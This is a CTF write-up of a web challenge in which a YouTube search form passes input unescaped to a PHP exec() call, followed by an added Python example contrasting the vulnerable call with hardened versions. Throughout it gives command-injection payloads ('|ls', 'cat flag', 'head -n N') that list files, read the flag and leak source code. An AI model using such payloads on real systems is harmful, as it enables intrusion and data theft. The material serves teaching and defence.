Tags: web oscommandinjection 

# ▼▼▼iFrame and Shame (Web:300), 64/948 teams = 6.8%▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

---

```
I overheard some guys bragging about how they have a custom Youtube search bar on their site. Put them to shame.

Note: The input from the search bar should be passed to a script that queries youtube using "youtube.com/results?search_query=[your query]". Then it will put it in an iframe. You are only seeing the one video because it is the default upon error.

http://iframeshame.tuctf.com
```

-----

【Features】

・Searching for an arbitrary string returns the URL of a matching YouTube video, which is then played.

・If the search finds nothing, the URL of the default video is returned and played instead.

-----

```
POST / HTTP/1.1
Host: iframeshame.tuctf.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 76

search=youtube.com/results?search_query="|ls||a+#&Submit=%E9%80%81%E4%BF%A1
```

`<iframe width="560" height="315" src="search.py?autoplay=1" frameborder="0" allowfullscreen></iframe>`

This shows that `search.py` exists.

It looks like only one line of output is being retrieved.

-----

Trying file-name patterns from `a*` through `z*`, the following three files turned up.

`search=youtube.com/results?search_query="|ls+f*||a+#&Submit=%E9%80%81%E4%BF%A1`

`<iframe width="560" height="315" src="flag?autoplay=1" frameborder="0" allowfullscreen></iframe>`

The `flag` file exists.

-----

`search=youtube.com/results?search_query="|ls+i*||a+#&Submit=%E9%80%81%E4%BF%A1`

`<iframe width="560" height="315" src="index.php?autoplay=1" frameborder="0" allowfullscreen></iframe>`

The `index.php` file exists.

-----

`search=youtube.com/results?search_query="|ls+s*||a+#&Submit=%E9%80%81%E4%BF%A1`

The `search.py` file exists.

-----

`search=youtube.com/results?search_query="|cat+flag||a+#&Submit=%E9%80%81%E4%BF%A1`

`<iframe width="560" height="315" src="https://www.youtube.com/embed/dQw4w9WgXcQ?autoplay=1" frameborder="0" allowfullscreen></iframe>`

That is the song "Rick Astley - Never Gonna Give You Up". A fake flag?

Only one line is ever shown, so a workaround is needed.

-----

Using `head -n 1 flag` and raising the line count each time, the whole file can be retrieved line by line (only the last line of the command's output ever reaches the page, so `head -n N` yields exactly line N).

`search=youtube.com/results?search_query="|head+-n+1+flag||a+#&Submit=%E9%80%81%E4%BF%A1`

```
HTTP/1.1 200 OK
Date: Sun, 26 Nov 2017 05:27:13 GMT
Server: Apache/2.4.10 (Debian)
Vary: Accept-Encoding
Content-Length: 350
Connection: close
Content-Type: text/html; charset=UTF-8

<form name="searchform" method="POST" action="">
<input id="search" type="text" name="search"/>
<input type="submit" name="Submit"/>
</form>

TUCTF{D0nt_Th1nk_H4x0r$_C4nt_3sc4p3_Y0ur_Pr0t3ct10ns}

<iframe width="560" height="315" src="https://www.youtube.com/embed/3GwjfUFyY6M?start=30&autoplay=1" frameborder="0" allowfullscreen></iframe>
```

`TUCTF{D0nt_Th1nk_H4x0r$_C4nt_3sc4p3_Y0ur_Pr0t3ct10ns}`

-----

(Reference: retrieving the source code)

Next, retrieve `search.py`.

```
search=youtube.com/results?search_query="|head+-n+1+search.py||a+#&Submit=%E9%80%81%E4%BF%A1
search=youtube.com/results?search_query="|head+-n+2+search.py||a+#&Submit=%E9%80%81%E4%BF%A1
search=youtube.com/results?search_query="|head+-n+3+search.py||a+#&Submit=%E9%80%81%E4%BF%A1
...
```

```
<iframe width="560" height="315" src="#!/usr/bin/python?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="import urllib?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="import urllib2?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="from sys import argv, exit?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="from bs4 import BeautifulSoup?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="if len(argv) < 2:?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" with open('error.log','a') as f:?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" f.write('Usage: %s query [error log file (default: error.log)]\n' % argv[0])?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" print 'error.log'?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" exit(1)?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="q = argv[1]?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="query = urllib.quote(q)?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="url = "https://www.youtube.com/results?search_query=" + query?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="response = urllib2.urlopen(url)?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="html = response.read()?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="soup = BeautifulSoup(html, 'lxml')?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="found = False?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="for vid in soup.findAll(attrs={'class':'yt-uix-tile-link'}):?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" if not vid['href'].startswith("https://googleads.g.doubleclick.net/"):?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" print 'https://www.youtube.com/embed/' + vid['href'].split('=')[1]?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" found = True?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" break?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=""""?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="if not found:?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" if len(argv) == 3:?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" fn = argv[2]?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" else:?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" fn = 'error.log'?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" with open('error.log','a') as f:?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" f.write('Video not found\n')?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" print fn?autoplay=1" frameborder="0" allowfullscreen></iframe>
```

```
#!/usr/bin/python
import urllib
import urllib2
from sys import argv, exit
from bs4 import BeautifulSoup
if len(argv) < 2:
    with open('error.log','a') as f:
        f.write('Usage: %s query [error log file (default: error.log)]\n' % argv[0])
    print 'error.log'
    exit(1)
q = argv[1]
query = urllib.quote(q)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, 'lxml')
found = False
for vid in soup.findAll(attrs={'class':'yt-uix-tile-link'}):
    if not vid['href'].startswith("https://googleads.g.doubleclick.net/"):
        print 'https://www.youtube.com/embed/' + vid['href'].split('=')[1]
        found = True
        break
"""
if not found:
    if len(argv) == 3:
        fn = argv[2]
    else:
        fn = 'error.log'
    with open('error.log','a') as f:
        f.write('Video not found\n')
    print fn
```

-----

Next, retrieve `index.php`.

```
search=youtube.com/results?search_query="|head+-n+1+index.php||a+#&Submit=%E9%80%81%E4%BF%A1
search=youtube.com/results?search_query="|head+-n+2+index.php||a+#&Submit=%E9%80%81%E4%BF%A1
search=youtube.com/results?search_query="|head+-n+3+index.php||a+#&Submit=%E9%80%81%E4%BF%A1
...
```

```
<iframe width="560" height="315" src="<form name="searchform" method="POST" action="">?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" <input id="search" type="text" name="search"/>?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" <input type="submit" name="Submit"/>?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="</form>?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="<?php?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="if (!isset($_POST['Submit']))?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="{?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" echo '<iframe width="560" height="315" src="https://www.youtube.com/embed/JIuYQ_4TcXg?start=9&autoplay=1" frameborder="0" allowfullscreen></iframe>';?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="}?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="else?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="{?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" $vid = exec('./search.py "' . $_POST['search'] . '"');?autoplay=1" frameborder="0" allowfullscreen></iframe>
TUCTF{D0nt_Th1nk_H4x0r$_C4nt_3sc4p3_Y0ur_Pr0t3ct10ns}

<iframe width="560" height="315" src="https://www.youtube.com/embed/3GwjfUFyY6M?start=30&autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" if (strpos($vid, $flag) === false)?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" {?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" echo '<iframe width="560" height="315" src="' . $vid . '?autoplay=1" frameborder="0" allowfullscreen></iframe>';?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" }?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" else?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" {?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" echo $flag . '<br/><br/>';?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" $vid = 'https://www.youtube.com/embed/3GwjfUFyY6M?start=30&autoplay=1';?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" echo '<iframe width="560" height="315" src="' . $vid . '" frameborder="0" allowfullscreen></iframe>';?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src=" }?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="}?autoplay=1" frameborder="0" allowfullscreen></iframe>
<iframe width="560" height="315" src="?>?autoplay=1" frameborder="0" allowfullscreen></iframe>
```

```
<form name="searchform" method="POST" action="">
<input id="search" type="text" name="search"/>
<input type="submit" name="Submit"/>
</form>
</iframe>';
}
else
{
$vid = exec('./search.py "' . $_POST['search'] . '"');
TUCTF{D0nt_Th1nk_H4x0r$_C4nt_3sc4p3_Y0ur_Pr0t3ct10ns}

https://www.youtube.com/embed/3GwjfUFyY6M?start=30&autoplay=1" frameborder="0" allowfullscreen></iframe>
if (strpos($vid, $flag) === false)
{
echo '' . $vid . '';
}
else
{
echo $flag . '

';
$vid = 'https://www.youtube.com/embed/3GwjfUFyY6M?start=30&autoplay=1';
echo '' . $vid . '" frameborder="0" allowfullscreen></iframe>';
}
}
?>
```

※ Reading the source, the line that was replaced by the flag output is the one that assigns `$flag`; the real source code is obtained by changing this part as follows (single quotes, since in a PHP double-quoted string the `$_C4nt_...` part of the flag would be interpolated as a variable).

```
TUCTF{D0nt_Th1nk_H4x0r$_C4nt_3sc4p3_Y0ur_Pr0t3ct10ns}

https://www.youtube.com/embed/3GwjfUFyY6M?start=30&autoplay=1" frameborder="0" allowfullscreen></iframe>

$flag = 'TUCTF{D0nt_Th1nk_H4x0r$_C4nt_3sc4p3_Y0ur_Pr0t3ct10ns}';
```

```
<form name="searchform" method="POST" action="">
    <input id="search" type="text" name="search"/>
    <input type="submit" name="Submit"/>
</form>
<?php
if (!isset($_POST['Submit']))
{
    echo '<iframe width="560" height="315" src="https://www.youtube.com/embed/JIuYQ_4TcXg?start=9&autoplay=1" frameborder="0" allowfullscreen></iframe>';
}
else
{
    // User input is concatenated straight into a shell command line: the OS command injection
    $vid = exec('./search.py "' . $_POST['search'] . '"');
    $flag = 'TUCTF{D0nt_Th1nk_H4x0r$_C4nt_3sc4p3_Y0ur_Pr0t3ct10ns}';
    if (strpos($vid, $flag) === false)
    {
        echo '<iframe width="560" height="315" src="' . $vid . '?autoplay=1" frameborder="0" allowfullscreen></iframe>';
    }
    else
    {
        echo $flag . '<br/><br/>';
        $vid = 'https://www.youtube.com/embed/3GwjfUFyY6M?start=30&autoplay=1';
        echo '<iframe width="560" height="315" src="' . $vid . '" frameborder="0" allowfullscreen></iframe>';
    }
}
?>
```
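The `exec()` line in `index.php` splices `$_POST['search']` into a double-quoted shell argument, so a `"` in the input closes that argument and the shell treats the rest (`|ls||a #`) as pipeline syntax; that is the whole bug this challenge is built on. As an added example, not part of the writeup or of the challenge's own code, the same mistake is modelled below in Python next to two hardened forms: passing argv as a list so that no shell is involved, and, where a command string is unavoidable, `shlex.quote()` in the role that PHP's `escapeshellarg()` should have played. The `search_stub.py` stand-in (which only records the argv it receives), the `ARGV_OUT` environment variable, the `SAFE_QUERY` allowlist and the `demo()` driver are assumptions made for this example.

```python
#!/usr/bin/env python3
# Added example (not from the writeup or the challenge): the command-building
# mistake in index.php modelled in Python, beside its hardened forms.
import ast
import os
import re
import shlex
import subprocess
import sys
import tempfile

# Constructed inputs: the writeup's payload (URL-decoded) and an ordinary query.
INJECTED = 'youtube.com/results?search_query="|ls||a #'
BENIGN = 'rick astley never gonna give you up'

# Hypothetical stand-in for search.py. It records the argv it received in the
# file named by ARGV_OUT, so we can see what the child actually got no matter
# what the shell did with its stdout.
STUB = (
    "import os, sys\n"
    "with open(os.environ['ARGV_OUT'], 'w') as f:\n"
    "    f.write(repr(sys.argv[1:]))\n"
)


def _child_argv(path):
    """Read back what the stub recorded (empty list if it never ran)."""
    if not os.path.exists(path):
        return []
    with open(path) as f:
        return ast.literal_eval(f.read())


def vulnerable_call(script, query, argv_out):
    """Mirror of exec('./search.py "' . $_POST['search'] . '"'): the query is
    spliced into a command string and /bin/sh parses the result, so a '"' in
    the query closes the argument and whatever follows is shell syntax."""
    cmd = '%s %s "%s"' % (shlex.quote(sys.executable), shlex.quote(script), query)
    if os.path.exists(argv_out):
        os.remove(argv_out)
    subprocess.run(cmd, shell=True, cwd=os.path.dirname(script),
                   env=dict(os.environ, ARGV_OUT=argv_out),
                   stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    return _child_argv(argv_out)


def hardened_call(script, query, argv_out):
    """Hardened form: argv is passed as a list and no shell is involved, so the
    query reaches the script as exactly one argument whatever it contains."""
    if os.path.exists(argv_out):
        os.remove(argv_out)
    subprocess.run([sys.executable, script, query],
                   env=dict(os.environ, ARGV_OUT=argv_out),
                   stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    return _child_argv(argv_out)


def quoted_roundtrip(script, query):
    """If a shell string is unavoidable, shlex.quote() does what PHP's
    escapeshellarg() should have done in index.php; shlex.split() shows the
    shell would hand the query back as a single word."""
    return shlex.split(script + ' ' + shlex.quote(query))


# Constructed allowlist for this example: what a search term may look like.
SAFE_QUERY = re.compile(r'[\w .\-]{1,200}')


def validate_query(query):
    """Defence in depth: reject unexpected input before anything is executed."""
    return SAFE_QUERY.fullmatch(query) is not None


def demo():
    """Run both call styles on both inputs in a scratch directory and return
    the argv the child saw in each case."""
    results = {}
    with tempfile.TemporaryDirectory() as d:
        script = os.path.join(d, 'search_stub.py')
        with open(script, 'w') as f:
            f.write(STUB)
        argv_out = os.path.join(d, 'argv.txt')
        for label, query in (('benign', BENIGN), ('injected', INJECTED)):
            results['vulnerable/' + label] = vulnerable_call(script, query, argv_out)
            results['hardened/' + label] = hardened_call(script, query, argv_out)
    return results


if __name__ == '__main__':
    for key, argv in sorted(demo().items()):
        print('%-20s %r' % (key, argv))
```

Running it shows `vulnerable/injected` recording only `youtube.com/results?search_query=`, the rest of the input having been consumed by the shell, while both `hardened/*` entries carry the complete string as one argument. The PHP fix is the same in spirit: do not build the `exec()` string by concatenation, and if a command string is unavoidable wrap each argument in `escapeshellarg()`.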